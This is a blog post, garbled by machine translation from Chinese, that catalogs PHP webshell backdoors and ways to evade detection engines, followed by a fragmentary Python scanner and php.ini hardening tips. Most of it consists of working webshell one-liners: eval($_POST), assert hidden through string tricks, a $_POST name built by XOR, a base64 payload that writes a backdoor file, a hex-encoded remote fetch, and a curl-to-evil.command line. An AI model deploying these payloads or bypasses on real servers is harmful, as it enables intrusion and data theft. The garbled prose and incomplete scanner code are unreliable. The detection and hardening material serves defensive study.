PHP WebSehll backdoor script and detection tool
2022-08-02 03:00:00 【wespten】
WebshellIs the common use of the website invasion of the back door,利用Webshell可以在Web服务器上执行系统命令、窃取数据、植入病毒、Blackmail core data、SE0挂马等恶意操作,危害极大.
所谓Webshell,Main points can be for exampleapache、tomcat、nginx在内的webserverInstant interpretive execution script language and text file,其本质是一种text文本文件.Because of its confidentiality、基于脚本、灵活便捷、功能强大等特点,Widely popular among hackers,因此WebshellThe detection is the focus of cloud security defense,Even as a standard security defense.
Attack-defense confrontation escalated in recent years,The challenge of defense is more and more big,Battlefield who is no longer see the sample of offence and defense more,And increasingly to the methodology level against,Attackers often tend to find some methodological system,Through the system level,Challenge to the defense.安骑士WebshellIn the process of detecting system in the fight against,Gradually developed a static rules+动态规则+词法ast解析+Dynamic simulation to perform+Machine learning, and other comprehensive measures,The purpose is to try to raise the threshold of the attack to bypass and cost,缓解Webshell攻击问题.
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册,We can find many exotic curiosity-a solution looking,例如:
二、PHPMay face all kinds of attacks
俗话说,“工欲善其事必先利其器”,作为工程师,Systematic cognition is our best“利器”,Initial point of knowledge accumulation is not too big problem,But the later further,The stronger the demand for systematic cognition will,It allows you to read my notebook thin.
XSS:对PHP的Web应用而言,Cross-site scripting is a vulnerable point of the.An attacker can use it to steal user information.你可以配置Apache,Or write a saferPHP代码(Validate all user input)来防范XSS攻击
SQL注入:这是PHP应用中,The database layer vulnerable to playing.Ways to prevent same as above.常用的方法是,使用mysql_real_escape_string()对参数进行转义,而后进行SQL查询.
文件上传:It allows visitors to placed on the server(即上传)文件.This causes such as,删除服务器文件、数据库,Get the user information such as a series of problems.你可以使用PHPTo prohibit file upload,Or write more secure code(Such as inspection user input,只允许上传png、gif这些图片格式)
包含本地与远程文件:An attacker can make to a remote server to open the file,运行任何PHP代码,Then upload or delete files,安装后门.Can be set by eliminating remote files to prevent
eval/assert:This function can make a string asPHP代码一样执行.It is often the attacker used to hide code and tools on the server.通过配置PHP,取消evalSuch as function call to realize
Sea-surt Attack(Cross-site request forgery,CSRF.跨站请求伪造):This attack can make the end user under current account to perform the specified behavior.Harmful to the end user data and operation safety.If the target end users account for administrator rights,整个WebApplications received a threat.
1. The attacker to external command parameter way
a. External parameters was obtained from the built-in global array
$cmd = ($_REQUEST["cmd"]);
echo "</pre>$cmd<pre>";
This can easily be detected security software.为了增强隐蔽性,The various deformation of a Trojan,Through a variety of functions to disguise.
b. Environment variable correlation function is used to collect the external parameters
c. The external parameters as a file/Directory information is written to disk
d. Deposited the external parameters inoutput buffering缓存中
e. 利用PHPNative function to obtain external parameters
f. 利用输入/The output stream for external parameters
g. Using the network request from a remoteIP获取外部参数
h. 利用xmlThe processing function for external parameters
i. Using the database related extension for external parameters
j. Use local register variables to receive external parameters
2. Dynamically generated numeric and string way
a. Dynamically generated array keys
① 利用try-catchStorage and generate the current arraykey
② Use another an array variable stores the current arraykey
③ 利用timeDelay logic to generate the current arraykey
④ 利用randomLogic to generate the current arraykey
b. Dynamically generated parameter name
By using the operator:自增、异或、取非、取反
c. Dynamically generated function name
① Using string concatenation technology
② 利用explodeString grouping technique
3. To encode string content/解码的方式
a. 利用BASE64编码/On the decoding technology
b. Using reverse string order related technology
c. Using text to replace related technologies
d. 利用0x16进制编码字符串
4. Introduced into arguments to the function/变量的方式
a.利用array callbackCorrelation function to realize parameters
b.利用defineParameter passing through macro definition means
c.Use the custom add/Decryption functions of the reentry after processing parameter passing
d.Use the class method overloading implementation of implicit parameter passing
e.利用try-catchWay of transfer function
try { throw new Exception("system"); }
5. 执行指令的方式
a. 利用PHPNative function executes instructions
<?php assert($_POST[sb]);?>
$item['wind'] = 'assert';
$array[] = $item;
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
<?php $a =str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]); ?> //说明:请求参数 ?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))
最终执行命令<?php assert(fputs(fopen('c.php',w),"<?php @eval($_POST[a]);?>"))?>
<?php ($code = $_POST['code']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add'); ?> //说明:首先,将eval函数用str_rot13('riny')隐藏.然后,利用 e 修饰符,在preg_replaceAfter finishing the string substitution,Make the engine will result string as aphp代码使用eval方式进行评估并将返回值作为最终参与替换的字符串.
<?php if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(sprintf('%s? %s',pack(“H*”,'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
b. 通过include方式执行指令
include ROOT_PATH . $_REQUEST['target'];
<?php $filename=$_GET['code'];include ($filename); ?> //由于includeMethod can be directly compiled any format file forphp格式运行,So you can upload atxt格式的php文件,Will the back door of the real written in the text.
c. 通过array callback executeWay to achieve code execution
($a = 'assert')&&($b = $_POST['a'])&&call_user_func_array($a, array($b));
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
d. The dynamic string function call feature(PHP中字符串可以直接作为函数名称被调用)
$dyn_func = $_GET['dyn_func']; $argument = $_GET['argument']; $dyn_func($argument);
e. 利用序列化/反序列化Features executes instructions
f. Using the class structure/Destructor features executes instructions
g. 利用anonymous (lambda-style) function(匿名函数)执行指令
eval("function lambda_n() { eval($_GET[1]); }"); lambda_n();
$a = function($b) { system($b); }; $a($_GET['c']);
h. By registering callback system executes instructions
i. Using the reflection technology executes instructions
j. 利用PHP ${}Features executes instructions
k. 利用系统输出缓存Technology executes instructions
l. 利用“Characteristics of execution system instruction
m. Using the string handling callback(string process callback)Technology executes instructions
n. Using the method of static class executes instructions
class foo { static function a(callable $b) { $b($_GET['c']); } } foo::a('system');
6. Dynamic change of program execution flow technology
a. 利用三元运算符
b. According to some external incoming parameters,To a certainIFCondition judgment result
c. 利用headerImplementation secondary jump
d. By moving the external instructions written to persistent storage system through again afterinclude执行
7. Attack the sandbox/Lexical engine related special technique
Code comments are inserted into
This sample has the following several bypass the point:
- 利用try-catchWay of transfer function
- External parameters was obtained from the built-in global array
- The dynamic string function call feature(PHP中字符串可以直接作为函数名称被调用)
To establish this kind of thinking framework has several advantages:
- phpLanguage features itself is there are different dimensions of,Within each dimension browse through the kernel source code,Can be fully exhaustive
- php的不同trickSimilar to each other between orthogonal dimensions,Through the study of the cross combinations of different dimensions,Can effectively write a lot of bypass the sample
- For an attacker to defenders of single point breakthrough,As long as find a particular bypass the point,Around this bypass the point,On the other dimensions of derivative,Often can be in a short period of time to create a large number of around,Convenient rapid breakthroughs in actual combat
2、Simulation execution coverage against
业内目前针对PHP Webshell,The mainstream approach is to use【静态/动态AST词法分析】或者【Dynamic sandbox test】技术,For this kind of defense,The battlefield is offensive and defensive game【The simulation engine finish】,具体来说例如:
- php各类版本、Ancient, syntax support
- Interrupt the stain track
- Father and son class data sharing
- 引用传递
- Undefined function call
- 利用报错/容错机制
- The control flow depends on the escape
- Macro definition to pass
- 等等….
We pick a few class focuses on
The control flow depends on the escape
可以看到,信息(外部参数)Transfer is not directly through the assignment/A function call to deliver,But by controlling the flow to implicit transfer,如果ASTEngine or sandbox can't correctly deal with the grammar,The stain information will be lost in the delivery process,导致最后在sinkSome can't effectively detect.
The means of attack is to useReflectionFunctionThe mapping class with reference parameters to modify$args的值,If the engine was not well deal with reference,Blot transfer will be interrupted.
Macro definition to pass
Using the macro variables,The external parameters can be passed.
3、The context dependence difference attack
The so-called context dependence difference attack,Refers to the running attack samples depends on specific context,From the information theory point of view,This can be understood as a kind of additional information,Offensive and defensive game of the battlefield is the information for.Security there is a common saying is“As far as possible at the scene of the attack happened to capture log、检测、And defense”,Many offline detection scheme,Because too far from the first attack site,In the context information loss serious,Caused a lot of difficulties on the detection and prevention.
Run multiple times to expose the real attack intention
Actual hackers use,Need to run several samples to trigger a real attack,The sandbox orASTEngines running is often only limited time.即所谓的“Hackers know how to run、Users also know,Is the defenders don't know”,This is a commonly used means of bypass in actual combat.
Stored by the environment variables such as third party temporary external parameters
首先通过putenv传递变量,After get variables ofpath内容,So only need toc=path=phpinfo();即可完成利用.
This kind of sample in the actual attack is easy to success,因为只要是Linux操作系统,webserverProcess generally have access to the operation of the environment variable.But for the detection engine,If there is no correct processing environment variable storage and access to relevant operating,Stain parameter is passed to failure.
4、Attack traffic difference attack
The so-called attack traffic difference attack,Is one of the most common attack to bypass will over,Is also a way of thinking,突破防御,Bypass the difference is to find the essence of defense system point,对于PHP Webshell来说,External transfer and flow is a critical point of difference.
In order to better illustrate the sandbox,The author here introduce two concepts,【Static reentrant samples】以及【Dynamic non-repeatable multimodal samples】.
所谓【Static reentrant samples】Refers to most of the traditionalPHP Webshell样本,我们称之为“Reentrant single-mode state samples”,Although such sample can be usephp的大量tricky特性、Using a variety of coding、加密手段,Code forms can be very complicated,例如
–我是分隔符 m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m m 结束–
但是,This sample,究其根本,其本质都是“可重入的、Single mode of”,That is to say no matter how many times to run,Who is going to run(受害者 or The bypass offline engine),其运行结果都是一样的.
From the point of view of stain tracing theory,This one phase of the sandbox,解决的是【Explicit blot transfer problem】,The stain in the flow of information transfer in the sample code is explicit,As long as the simulation execution can again100%模拟.
另一方面,对于【Dynamic non-repeatable multimodal samples】来说,The key to this sample is not use ofphp的哪些tricky语法特性,而在于它的“不可重入性、Multiple modal”,We use specific examples to explain.
Dynamic dependent branches problem(Based on the input parameters of dynamic decision execution flow and execution action)
For the sample,The road of external parameters like a map,标识了一个“road chain”,Only strictly abide by the“road chain”运行到最后,Can see samples of the real attack intention.And that for the industry a lot of bypass detection engine,都是一个很大的挑战,In the branch of exponential,Once a branch is headed in the wrong,Will be implemented the attacker to bypass.
Based on the external parameters dynamically generated function name
Main attack to the sandbox and dynamicASTEngine as a representative of the bypass offline detection technology,Offline detection because of the loss of the scene of the attack the context information,So difficult to simulate the actual attack behavior.
Unusual way of external parameters
For the industry commonly used【Stain track detection technology】,Basic all know manufacturers toPHP常见的HTTPSuper parameter markers for stain,例如GET/POST/COOKIE等.
但实际上,External parameters is a generic concept,理论上来说,“All external controllable input is bad,All need to be tracked”.External controllable input source is a channel, the concept of,原则上,只要是符合“外部可控、内容可控”Characteristics of the two way,Belong to the external controllable input.它们包括但不限于:
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
header('HTTP/1.1 404 Not Found');
Through a variety of functions to disguise,这里不得不吐槽PHPWeak type is deadly for safety.
- HTTP Header信息输入
- Network channel input:As long as the sourceapi的return zvalTo stain mark,Then will stain marks asapi sequence被传递
file_get_contents() socket_create_listen() socket_listen() curl_init()
- Through the system instructions wrapper performs network related,Taking instructions from the external network information
system():system(“curl xxxxx/evil.command”) popen() exec() passthru() shell_exec() “
- External controllable parameters obtained through database related operation
Dependence on external parameters under the condition
5、Against static detection rules
Against static detection rules is we used to say,Bypass so-and-so manufacturer's regular detection rules of black.This kind of attack way industry discuss article has very much,The author here go.
The author hope here in this paper, the methodology of an attack static detection rules,即【Using redundancy reduction of a fraction can be sample deformation】.
观察如下3个表达式,将其视作webshellA logical abstract version of the sample:
((X+6)+Y)+X + (if( (X*Y)>0 ){X}else{X} + X*X) + (X + (Y - (X + if(6>0){1}else{0})) )
# X*Y恒大于0,Property may be reduced as:
2*X + Y + 6 + X + X**2 + (X + (Y - (X + if(6>0){1}else{0})) )
# 6恒大于0,Property may be reduced as:
2*X + Y + 6 + X + X**2 + X + Y - X + 1
The final reduction get:
X**2 + 3*X + 2*Y + 5
从最终结果,Also is the function,上面3An expression is the same.
If the last expression is regarded as one of the most compact editionwebshell,例如:
<?php eval($_POST[1]);?>
According to the laws of the redundancy can be reduced,Realize the same function of the code,Can have infinite extension,This is an enumeration.
link(__FILE__, 'ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsK');
link(__FILE__, 'YXNzZXJ0Cg==');
$d = substr(readlink('ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsK'), -32);
$e = substr(readlink('YXNzZXJ0Cg=='), -12);
$e = base64_decode($e);
$b = $e[0].'ssert';
这2A file on the code architecture,存在非常大的区别.
This redundancy reduction can be,Led directly to sample the disassembly result、apicallSequence result difference is very big.
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
$ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");
$smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");
$jgfi = $ftdf("l","","lclrlelaltel_functlilon");
$rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();
四、PHP WebShell 检测工具
Visual search way also has a lot of:
通过文件名/修改时间/大小,File backup than found abnormal(SVN/Git对比,查看文件是否被修改)
通过WEBSHELLThe back door scanning script found,如Scanbackdoor.php/Pecker/shelldetect.php/(zhujiweishi )
下面是360 zhujiweishi ,在linuxVery simple to use on the server.
Through the common keywords such as(可以使用find 和 grep Commands such as combined search code contains the following files):
系统命令执行: system, passthru, shell_exec, exec, popen, proc_open
代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
#!/usr/bin/env python
# encoding: utf-8
import os,sys
import re
import hashlib
import time
rulelist = [
'(new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\))',
def scan(path):
print(' 可疑文件 ')
for root,dirs,files in os.walk(path):
for filespath in files:
if os.path.getsize(os.path.join(root,filespath))<1024000:
file= open(os.path.join(root,filespath))
filestr = file.read()
for rule in rulelist:
result = re.compile(rule).findall(filestr)
if result:
print '文件:'+os.path.join(root,filespath )
print '恶意代码:'+str(result[0][0:200])
print ('最后修改时间:'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(os.path.getmtime(os.path.join(root,filespath)))))
print '\n\n'
def md5sum(md5_file):
m = hashlib.md5()
fp = open(md5_file)
return m.hexdigest()
if md5sum('/etc/issue') == '3e3c7c4194b12af573ab11c16990c477':
if md5sum('/usr/sbin/sshd') == 'abf7a90c36705ef679298a44af80b10b':
print "\033[31m sshd被修改,Suspected left the back door\033[m"
if md5sum('/etc/issue') == '6c9222ee501323045d85545853ebea55':
if md5sum('/usr/sbin/sshd') == '4bbf2b12d6b7f234fa01b23dc9822838':
print "\033[31m sshd被修改,Suspected left the back door\033[m"
if __name__=='__main__':
if len(sys.argv)!=2:
print '参数错误'
print "\tAccording to the malicious code to find:"+sys.argv[0]+'目录名'
if os.path.lexists(sys.argv[1]) == False:
print "目录不存在"
print ('\n\n开始查找:'+sys.argv[1])
if len(sys.argv) ==2:
php.ini 设置:
disable_functions =phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,get_current_user,leak,putenv,popen,opendir
禁止“open_basedir” To prohibit the specified directory file operations
expose_php设为off 这样php不会在httpIn the file header leaked information
设置“allow_url_fopen”为“off” Can prohibit the remote file function
log_errors”设为“on” 错误日志开启
所有用户提交的信息 post get Or other form submitted data Write a filter function have to separate processing again,养成习惯(intval,strip_tags,mysql_real_escape_string)
Always check for a Trojan eval($_POST[ 全站搜索phpDid the code to the source code
File to naming conventions At least let oneself can be clear at a glance,哪些phpThere is something wrong with the file name
If use open source code,Have the patch out,On patch as soon as possible
If the supreme authority of the attacker got the server,Possible by changing the server configuration filephp.iniTo achieve the purpose of their hidden back door,The more popular a few years ago.原理如下:php.ini Inside the two configuration items:auto_prepend_file ,auto_append_file 可以让php解析前,You add something in Automatically add files before or after any PHP document,If the configurationeval()The back door of the function That is very cunning,phpFile code inside with the,只会在phpBefore parsing containseval()函数进来 And because it is a global 所以所有phpThe page is the back door!So want to make sureauto_prepend_file ,auto_append_fileHas not been configured to something else,For the first3Some source code of the test.
As far as possible with minimal access configuration,Don't write or perform directory can not give the corresponding privileges
nginx或者apache配置的时候,Can not access the directory must be configured todeny
综上,对于【php一句话webshell】这个概念来说,其包含的集合是一个无限集合,这个问题可能不是一个数据问题(data problem),而是一个机制问题(mechanism problem).
